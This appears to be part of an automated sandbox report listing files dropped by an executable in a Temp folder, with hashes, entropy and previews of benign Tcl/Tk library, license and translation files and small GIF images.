                                                                                                                                                                                                                                                    MD5:A5E4284D75C457F7A33587E7CE0D1D99
                                                                                                                                                                                                                                                    SHA1:FA98A0FD8910DF2EFB14EDAEC038B4E391FEAB3C
                                                                                                                                                                                                                                                    SHA-256:BAD9116386343F4A4C394BDB87146E49F674F687D52BB847BD9E8198FDA382CC
                                                                                                                                                                                                                                                    SHA-512:4448664925D1C1D9269567905D044BBA48163745646344E08203FCEF5BA1524BA7E03A8903A53DAF7D73FE0D9D820CC9063D4DA2AA1E08EFBF58524B1D69D359
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 48 x 75
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1171
                                                                                                                                                                                                                                                    Entropy (8bit):7.289201491091023
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:DOfHIzP8hqiF+oyPOmp3XHhPBlMVvG0ffWLpfc:DGoPM+o0OmZXHhOv5WRc
                                                                                                                                                                                                                                                    MD5:7013CFC23ED23BFF3BDA4952266FA7F4
                                                                                                                                                                                                                                                    SHA1:E5B1DED49095332236439538ECD9DD0B1FD4934B
                                                                                                                                                                                                                                                    SHA-256:462A8FF8FD051A8100E8C6C086F497E4056ACE5B20B44791F4AAB964B010A448
                                                                                                                                                                                                                                                    SHA-512:A887A5EC33B82E4DE412564E86632D9A984E8498F02D8FE081CC4AC091A68DF6CC1A82F4BF99906CFB6EA9D0EF47ADAC2D1B0778DCB997FB24E62FC7A6D77D41
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 100 x 100
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5473
                                                                                                                                                                                                                                                    Entropy (8bit):7.754239979431754
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:+EqG96vSGfyJZ26G6U1LI7nTD2enhjc+2VBnOqcUERVIim:+46KcyJI6G6uU7/LhjlkhQR7m
                                                                                                                                                                                                                                                    MD5:048AFE69735F6974D2CA7384B879820C
                                                                                                                                                                                                                                                    SHA1:267A9520C4390221DCE50177E789A4EBD590F484
                                                                                                                                                                                                                                                    SHA-256:E538F8F4934CA6E1CE29416D292171F28E67DA6C72ED9D236BA42F37445EA41E
                                                                                                                                                                                                                                                    SHA-512:201DA67A52DADA3AE7C533DE49D3C08A9465F7AA12317A0AE90A8C9C04AA69A85EC00AF2D0069023CD255DDA8768977C03C73516E4848376250E8D0D53D232CB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2208
                                                                                                                                                                                                                                                    Entropy (8bit):5.100926243789827
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:ox3uZcRTvy3DauG4+bHnr32s3eGw8YKxPiOXR3ojdS+mFf:hcFaz+bL3e8n3XR3ojdtOf
                                                                                                                                                                                                                                                    MD5:8B74B116CD5C4334D08F62B9265A482D
                                                                                                                                                                                                                                                    SHA1:D1C745B315BF5B14BBD61C002BD6BE33426EA9B4
                                                                                                                                                                                                                                                    SHA-256:4D337CAE08517060A21E404CDBACE9C4EA191E57BA0638864473F01E67C9F457
                                                                                                                                                                                                                                                    SHA-512:0E52ACED6739375F3D1A3D33333292F0DB03249AE138CCFE96437C6908D1594CA311587542FCEC5ADBC254BB5D7C1BF3976352AB86A2B23DBAB0D9BA05100470
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:This software is copyrighted by the Regents of the University of.California, Sun Microsystems, Inc., and other parties. The following.terms apply to all files associated with the software unless explicitly.disclaimed in individual files...The authors hereby grant permission to use, copy, modify, distribute,.and license this software and its documentation for any purpose, provided.that existing copyright notices are retained in all copies and that this.notice is included verbatim in any distributions. No written agreement,.license, or royalty fee is required for any of the authorized uses..Modifications to this software may be copyrighted by their authors.and need not follow the licensing terms described here, provided that.the new terms are clearly indicated on the first page of each file where.they apply...IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY.FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES.ARISING OUT OF THE USE OF THIS SOFTWARE, IT
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):14278
                                                                                                                                                                                                                                                    Entropy (8bit):4.889913584738437
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:ZUjtAchYusFvpgM6UFchqHjNw8wSdy+1a22YDE/q:ZLgTUBjW8RQcf
                                                                                                                                                                                                                                                    MD5:CD15965D867244614D6F930B2CBC0CA9
                                                                                                                                                                                                                                                    SHA1:3FD888D2C893E2F9FDF8FDCF91F56FB770996D51
                                                                                                                                                                                                                                                    SHA-256:F6A17CD097C2089549BB3DA431CE7F6BA0A238ADA40F7591D45961DA774687FE
                                                                                                                                                                                                                                                    SHA-512:0897B57A8BCD93BC32D8A63355C4F788ECBCD5780494CD47790C9EE26819595303765915B9862AB4D1C9B47B4804BE10C76DF7D40C3CE75582EA3A2A60CC176D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# listbox.tcl --.#.# This file defines the default bindings for Tk listbox widgets.# and provides procedures that help in implementing those bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1995 Sun Microsystems, Inc..# Copyright (c) 1998 by Scriptics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#--------------------------------------------------------------------------.# tk::Priv elements used in this file:.#.# afterId -..Token returned by "after" for autoscanning..# listboxPrev -..The last element to be selected or deselected.#...during a selection operation..# listboxSelection -.All of the items that were selected before the.#...current selection operation (such as a mouse.#...drag) started; used to cancel an operation..#--------------------------------------------------------------------------..#------------------------------------
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):38042
                                                                                                                                                                                                                                                    Entropy (8bit):4.871518538014406
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:0K5IGCwGH71JtVbQDFTo06WpSCeihpzuxdyQYEuH9DAW9:0K5dWHDs69WuxdRYxHS0
                                                                                                                                                                                                                                                    MD5:302A2B300B4430E0396F6C4798A91BE2
                                                                                                                                                                                                                                                    SHA1:EAA8E790D7447F5FDBA51A684FA4E8F6A7F15210
                                                                                                                                                                                                                                                    SHA-256:FAD0BFC58C9DC718013740B8A144C494B3129C686E7CE912314429EB06A48A55
                                                                                                                                                                                                                                                    SHA-512:7FF4F213DD88D6DDD08F542EDE14D03290A588B81BEF293F22919564514DA20B066FD7D2F387667B2B23E6A1440CD57A0B9FD73C20B8C68CE09B1DD65E8DEF3C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# menu.tcl --.#.# This file defines the default bindings for Tk menus and menubuttons..# It also implements keyboard traversal of menus and implements a few.# other utility procedures related to menus..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1998-1999 by Scriptics Corporation..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# cursor -..Saves the -cursor option for the posted menubutton..# focus -..Saves the focus during a menu selection operation..#...Focus gets restored here when the menu is unposted..# grabGlobal -..Used in conjunction with tk::Priv(oldGrab): if.#...tk::Priv(oldGrab) is non-empty, then tk::Pr
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):27195
                                                                                                                                                                                                                                                    Entropy (8bit):4.814848179189606
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:PbIvXHip4HOvtmXSckY6hwE9iM/Q9NSF7HBZ2l0K:PMXHip4HOvtmXSck5wE9iMMSHK
                                                                                                                                                                                                                                                    MD5:A9465C342EEA4655624C5330BED9FA47
                                                                                                                                                                                                                                                    SHA1:BC3B0A948F543C9365E0602099A9CB470066B725
                                                                                                                                                                                                                                                    SHA-256:C468D571980AA994F1475146E3D755F614ED4EED9B3E429557EBB722E4CA8566
                                                                                                                                                                                                                                                    SHA-512:868C3F29686429EAA3C3A25A74AD4C7805607CAA1A505464B8818150B44B6EE96CAA7E8785A452BB75483E8D3658B5B1876250D5144B4ED97908D13E7EEF9DDD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# mkpsenc.tcl --.#.# Creates Postscript encoding vector for given encoding.# ..proc ::tk::CreatePostscriptEncoding {encoding} {. # now check for known. Even if it is known, it can be other. # than we need. GhostScript seems to be happy with such approach. set result "/CurrentEncoding \[\n". for {set i 0} {$i<256} {incr i 8} {. for {set j 0} {$j<8} {incr j} {.. set enc [encoding convertfrom $encoding [format %c [expr {$i+$j}]]].. if {[catch {format %04X [scan $enc %c]} hexcode]} {set hexcode {}}.. if [info exists ::tk::psglyphs($hexcode)] {...append result "/$::tk::psglyphs($hexcode)".. } else {...append result "/space".. }..}..append result "\n". }. append result "\] def\n". return $result.}..# List of adobe glyph names. Converted from glyphlist.txt, downloaded.# from Adobe..namespace eval ::tk {.array set psglyphs {. 0020 space. 0021 exclam. 0022 quotedbl. 0023 numbersign. 0024 dollar. 0025 percent. 0026 ampersand. 0027 quotes
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:xbm image (32x, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):17035
                                                                                                                                                                                                                                                    Entropy (8bit):4.710609471760674
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:aWsDPYblrrdc2fjAwnAVphS3OJifWMCXEcjY:an2fjAwMhDifgXt0
                                                                                                                                                                                                                                                    MD5:C157309C857AE2B6AEC5AC0E37F0D28F
                                                                                                                                                                                                                                                    SHA1:ACA7F286D579A4480728BB379492E4F241266920
                                                                                                                                                                                                                                                    SHA-256:3DE607042231819ECFB9FEAB86B23AAAF88AF9352E23D50A5560CDC1E0B55021
                                                                                                                                                                                                                                                    SHA-512:BC4038E35526201B32EDD6417C4943A27D5ABBD19ABEAABD3A3E15503C323B9731624DABBF244F0349450921A54576C661F61F2858ED176C4D9FD69D20B6561E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# msgbox.tcl --.#.#.Implements messageboxes for platforms that do not have native.#.messagebox support..#.# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# Ensure existence of ::tk::dialog namespace.#.namespace eval ::tk::dialog {}..image create bitmap ::tk::dialog::b1 -foreground black \.-data "#define b1_width 32\n#define b1_height 32.static unsigned char q1_bits[] = {. 0x00, 0xf8, 0x1f, 0x00, 0x00, 0x07, 0xe0, 0x00, 0xc0, 0x00, 0x00, 0x03,. 0x20, 0x00, 0x00, 0x04, 0x10, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x10,. 0x04, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,. 0x01, 0x00, 0x00, 0x80, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,. 0x04, 0x00, 0x00, 0x20, 0x08, 0x00,
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4506
                                                                                                                                                                                                                                                    Entropy (8bit):4.741055603590887
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:R9gwwTNGN62C9Gq+quUa9DwvlgtnSsgPVp5QanWQfl5:Rq7TNuC9Squg9gcsgPVcS5
                                                                                                                                                                                                                                                    MD5:9A24B935D8E3F60A0947CF3F16917575
                                                                                                                                                                                                                                                    SHA1:E9DB0557F08272C2A82FDACA06D46970347B476D
                                                                                                                                                                                                                                                    SHA-256:A3419AF7BDEFCB892BF6410EC71BF95EEA2E715E9BBAC53FB93B63A3F84256CE
                                                                                                                                                                                                                                                    SHA-512:7E84420277919E9C5E38A68E76115812E95343E721A313BE350A691510BE68D4A0B5554139AF4FA681A16BB11DF11E8A7356A08463105A9712E37AF43AB34F45
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset cs "&Abort" "&P\u0159eru\u0161it". ::msgcat::mcset cs "&About..." "&O programu...". ::msgcat::mcset cs "&Blue" "&Modr\341". ::msgcat::mcset cs "&Cancel" "&Zru\u0161it". ::msgcat::mcset cs "&Clear Console" "&Smazat konzolu". ::msgcat::mcset cs "&Copy" "&Kop\355rovat". ::msgcat::mcset cs "&Delete" "&Smazat". ::msgcat::mcset cs "&Directory:" "&Adres\341\u0159:". ::msgcat::mcset cs "&Edit" "&\332pravy". ::msgcat::mcset cs "&File" "&Soubor". ::msgcat::mcset cs "&Filter" "&Filtr". ::msgcat::mcset cs "&Green" "Ze&len\341". ::msgcat::mcset cs "&Help" "&N\341pov\u011bda". ::msgcat::mcset cs "&Hide Console" "&Schovat Konzolu". ::msgcat::mcset cs "&Ignore" "&Ignorovat". ::msgcat::mcset cs "&No" "&Ne". ::msgcat::mcset cs "&OK". ::msgcat::mcset cs "&Open" "&Otev\u0159\355t". ::msgcat::mcset cs "&Quit" "&Ukon\u010dit". ::msgcat::mcset cs "&Red" "\u010ce&rven\341". ::msgcat::mcset cs "&Retry" "Z&novu
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3866
                                                                                                                                                                                                                                                    Entropy (8bit):4.605623854056765
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:G8D/jSf5s80vWC0x5kTvgXTfODYE9lAUt:G8rmB0Z0x5kTv4sbt
                                                                                                                                                                                                                                                    MD5:523DD23F26D7110CB9183AD16C837417
                                                                                                                                                                                                                                                    SHA1:BDDBE76BC0C30CFFADD1B8DB178C480E896D9B65
                                                                                                                                                                                                                                                    SHA-256:6D58D7F39876FF0A74BE833E6E8CEC8E2131152B821C6311B7D203CE340C8521
                                                                                                                                                                                                                                                    SHA-512:977AFFB43AE853D4F961FD84CC48C57794BD6FAB4BB61C12750DF7EDD910A36987BC9B830C23EB487DF7ED4452D9EDB57501E2E2FB9FDA15D822540C101071A0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset da "&Abort" "&Afbryd". ::msgcat::mcset da "&About..." "&Om...". ::msgcat::mcset da "All Files" "Alle filer". ::msgcat::mcset da "Application Error" "Programfejl". ::msgcat::mcset da "&Blue" "&Bl\u00E5". ::msgcat::mcset da "&Cancel" "&Annuller". ::msgcat::mcset da "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ikke skifte til katalog \"%1\$s\".\nIngen rettigheder.". ::msgcat::mcset da "Choose Directory" "V\u00E6lg katalog". ::msgcat::mcset da "&Clear" "&Ryd". ::msgcat::mcset da "&Clear Console" "&Ryd konsolen". ::msgcat::mcset da "Color" "Farve". ::msgcat::mcset da "Console" "Konsol". ::msgcat::mcset da "&Copy" "&Kopier". ::msgcat::mcset da "Cu&t" "Kli&p". ::msgcat::mcset da "&Delete" "&Slet". ::msgcat::mcset da "Details >>" "Detailer". ::msgcat::mcset da "Directory \"%1\$s\" does not exist." "Katalog \"%1\$s\" findes ikke.". ::msgcat::mcset da "&Directory:" "&Katalog:".
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4150
                                                                                                                                                                                                                                                    Entropy (8bit):4.594758112169527
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:13LqlagtGIvz8MFU9RvjwKAN98qqU007Qt:6/KRrwKYtIt
                                                                                                                                                                                                                                                    MD5:139BC00416C426A552879AB5295105A0
                                                                                                                                                                                                                                                    SHA1:2C66C715E44BCB6EF6396D1197E9848FA3196F6F
                                                                                                                                                                                                                                                    SHA-256:6513BEAB8B2FF7D13D6AE1455F088AEC5EFF911288889162330DF7F70B90C9ED
                                                                                                                                                                                                                                                    SHA-512:43644BA01244BA2486DB1E75BEC325A78D7852BB319D1B4A5145E577663BC624BFD123C41F909C212D43598FDA6518486BC4D0E717BE085F7FFDA20C0FC72D19
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset de "&Abort" "&Abbruch". ::msgcat::mcset de "&About..." "&\u00dcber...". ::msgcat::mcset de "All Files" "Alle Dateien". ::msgcat::mcset de "Application Error" "Applikationsfehler". ::msgcat::mcset de "&Blue" "&Blau". ::msgcat::mcset de "&Cancel" "&Abbruch". ::msgcat::mcset de "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kann nicht in das Verzeichnis \"%1\$s\" wechseln.\nKeine Rechte vorhanden.". ::msgcat::mcset de "Choose Directory" "W\u00e4hle Verzeichnis". ::msgcat::mcset de "Cl&ear" "&R\u00fccksetzen". ::msgcat::mcset de "&Clear Console" "&Konsole l\u00f6schen". ::msgcat::mcset de "Color" "Farbe". ::msgcat::mcset de "Console" "Konsole". ::msgcat::mcset de "&Copy" "&Kopieren". ::msgcat::mcset de "Cu&t" "Aus&schneiden". ::msgcat::mcset de "&Delete" "&L\u00f6schen". ::msgcat::mcset de "Details >>". ::msgcat::mcset de "Directory \"%1\$s\" does not exist." "Das Verzeichnis \"%1\$s
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (355)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8609
                                                                                                                                                                                                                                                    Entropy (8bit):4.298043622238247
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:tCrF5o/cmSHbkI8+ETnFI3mC2hk9I+c6M30UPfMNDz9BybFkm5w+kGR8MOFiL0xc:wp5RmSHlsFerVIfM5vsam5VOQAkF
                                                                                                                                                                                                                                                    MD5:39372CE223E6F5FAF512936833AC82E2
                                                                                                                                                                                                                                                    SHA1:62A84DD84ACCAC75847BBB453CB4E1A1B0151ECE
                                                                                                                                                                                                                                                    SHA-256:5544E31148EDF7D0380425875FAC92164E577BB72D3FF054182D6B0F26EB49CF
                                                                                                                                                                                                                                                    SHA-512:55F810C46DF2E069C07FA102B88184710C6C67270DF020E7F8F753E9AC7BA3081F339E1876CC658FE92CB60CD67EB13A987BE1F3E35E627D8F325B6D5C9CE04B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:## Messages for the Greek (Hellenic - "el") language..## Please report any changes/suggestions to:.## petasis@iit.demokritos.gr..namespace eval ::tk {. ::msgcat::mcset el "&Abort" "\u03a4\u03b5\u03c1\u03bc\u03b1\u03c4\u03b9\u03c3\u03bc\u03cc\u03c2". ::msgcat::mcset el "About..." "\u03a3\u03c7\u03b5\u03c4\u03b9\u03ba\u03ac...". ::msgcat::mcset el "All Files" "\u038c\u03bb\u03b1 \u03c4\u03b1 \u0391\u03c1\u03c7\u03b5\u03af\u03b1". ::msgcat::mcset el "Application Error" "\u039b\u03ac\u03b8\u03bf\u03c2 \u0395\u03c6\u03b1\u03c1\u03bc\u03bf\u03b3\u03ae\u03c2". ::msgcat::mcset el "&Blue" "\u039c\u03c0\u03bb\u03b5". ::msgcat::mcset el "&Cancel" "\u0391\u03ba\u03cd\u03c1\u03c9\u03c3\u03b7". ::msgcat::mcset el \."Cannot change to the directory \"%1\$s\".\nPermission denied." \."\u0394\u03b5\u03bd \u03b5\u03af\u03bd\u03b1\u03b9 \u03b4\u03c5\u03bd\u03b1\u03c4\u03ae \u03b7 \u03b1\u03bb\u03bb\u03b1\u03b3\u03ae \u03ba\u
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2793
                                                                                                                                                                                                                                                    Entropy (8bit):4.232798253032259
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:sqH4qCtvLPgyqL+1ylnJzqFJHNaXSxFF4RTDuurIlnB:dYJtDPgDjnwIXSZ4RTDuTlB
                                                                                                                                                                                                                                                    MD5:BEE15DD39FA7291FA7CCBC2171BFA885
                                                                                                                                                                                                                                                    SHA1:3E6327758BA97EF3C27527AD7FADCD5252EB297B
                                                                                                                                                                                                                                                    SHA-256:B8158342926DA30F6D52AEAF5C61F68866674DA22D511770EB2C1685634A34BD
                                                                                                                                                                                                                                                    SHA-512:C9F13FF19011D7331EB3AED0EAB7B10F25CCACEC1AFB3C943F960033A8EF63819C956B02BEAF674BC6669810691DB14D155E4020C48889315711DA53A8624424
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset en "&Abort". ::msgcat::mcset en "&About...". ::msgcat::mcset en "All Files". ::msgcat::mcset en "Application Error". ::msgcat::mcset en "&Blue". ::msgcat::mcset en "&Cancel". ::msgcat::mcset en "Cannot change to the directory \"%1\$s\".\nPermission denied.". ::msgcat::mcset en "Choose Directory". ::msgcat::mcset en "Cl&ear". ::msgcat::mcset en "&Clear Console". ::msgcat::mcset en "Color". ::msgcat::mcset en "Console". ::msgcat::mcset en "&Copy". ::msgcat::mcset en "Cu&t". ::msgcat::mcset en "&Delete". ::msgcat::mcset en "Details >>". ::msgcat::mcset en "Directory \"%1\$s\" does not exist.". ::msgcat::mcset en "&Directory:". ::msgcat::mcset en "&Edit". ::msgcat::mcset en "Error: %1\$s". ::msgcat::mcset en "E&xit". ::msgcat::mcset en "&File". ::msgcat::mcset en "File \"%1\$s\" already exists.\nDo you want to overwrite it?". ::msgcat::mcset en "File \"%1\$s\" already exists.\n\n"
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):63
                                                                                                                                                                                                                                                    Entropy (8bit):4.185724027617087
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:fEGp6fR1FAGoW8vMKEQXK:sooLoQO6
                                                                                                                                                                                                                                                    MD5:EC6A7E69AB0B8B767367DB54CC0499A8
                                                                                                                                                                                                                                                    SHA1:6C2D6B622429AB8C17E07C2E0F546469823ABE57
                                                                                                                                                                                                                                                    SHA-256:FB93D455A9D9CF3F822C968DFB273ED931E433F2494D71D6B5F8D83DDE7EACC2
                                                                                                                                                                                                                                                    SHA-512:72077EAB988979EB2EE292ACDB72537172A5E96B4262CE7278B76F0FEBD7E850D18221DB551D1DE3C6EB520985B5E9642936BEEB66032F920593276784525702
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset en_gb Color Colour.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3845
                                                                                                                                                                                                                                                    Entropy (8bit):4.560432766214962
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:9714EhrzeUv0xrFf+/eR0Mqp+cIFIXd/JcrtCcuUc6Sq4Pe:97148efrF2GSMqgcIFIXdhAene
                                                                                                                                                                                                                                                    MD5:AD6C8299D63C606F46B91E55E923020A
                                                                                                                                                                                                                                                    SHA1:4E5EEF89C33B152661C7D5D74BBE54AE3C215CC8
                                                                                                                                                                                                                                                    SHA-256:ED651A2C8EEA8B373AF753C35EC7DFD91A284F2CAFCA8697985C83676D382E8B
                                                                                                                                                                                                                                                    SHA-512:F3770BB399E4EA5FC28F1A39BA850A8DACC3FB8F7661BD99F3D43F3BD5548C12E5C409840CD29256EFD40C282B614E0A76E0061C8F11EFFC6828574FEBD70D21
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset eo "&Abort" "&\u0108esigo". ::msgcat::mcset eo "&About..." "Pri...". ::msgcat::mcset eo "All Files" "\u0108ioj dosieroj". ::msgcat::mcset eo "Application Error" "Aplikoerraro". ::msgcat::mcset eo "&Blue" "&Blua". ::msgcat::mcset eo "&Cancel" "&Rezignu". ::msgcat::mcset eo "Cannot change to the directory \"%1\$s\".\nPermission denied." "Neeble \u0109angi al dosierulon \"%1\$s\".\nVi ne rajtas tion.". ::msgcat::mcset eo "Choose Directory" "Elektu Dosierujo". ::msgcat::mcset eo "&Clear" "&Klaru". ::msgcat::mcset eo "&Clear Console" "&Klaru konzolon". ::msgcat::mcset eo "Color" "Farbo". ::msgcat::mcset eo "Console" "Konzolo". ::msgcat::mcset eo "&Copy" "&Kopiu". ::msgcat::mcset eo "Cu&t" "&Enpo\u015digu". ::msgcat::mcset eo "&Delete" "&Forprenu". ::msgcat::mcset eo "Details >>" "Detaloj >>". ::msgcat::mcset eo "Directory \"%1\$s\" does not exist." "La dosierujo \"%1\$s\" ne ekzistas.". ::msgcat::mc
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3924
                                                                                                                                                                                                                                                    Entropy (8bit):4.499108281229709
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:vTE1U2XR5GiWXirZe0uoH0KQyTaBi2DcDmQ/jY33lEzTCyfv:volXgFHyGB3ELxDH
                                                                                                                                                                                                                                                    MD5:4C1B749AC7182F4F4AE0B1D17356BDE0
                                                                                                                                                                                                                                                    SHA1:1843D238DEC98DEC543FE2AF8C392CD461DD0A72
                                                                                                                                                                                                                                                    SHA-256:F9D5D6C76D7AF1431C332186CB9FABB2F47A98E8A970265DF312222BA6F59C0A
                                                                                                                                                                                                                                                    SHA-512:610C4C4C26B750171304B34BA3BE501B9F2CFC252CEB40A1FA181A3087C07D6741106609A77A32BD3EFB8FF4F548852022FEF4B77159E2F01B4202E6BCC995AF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
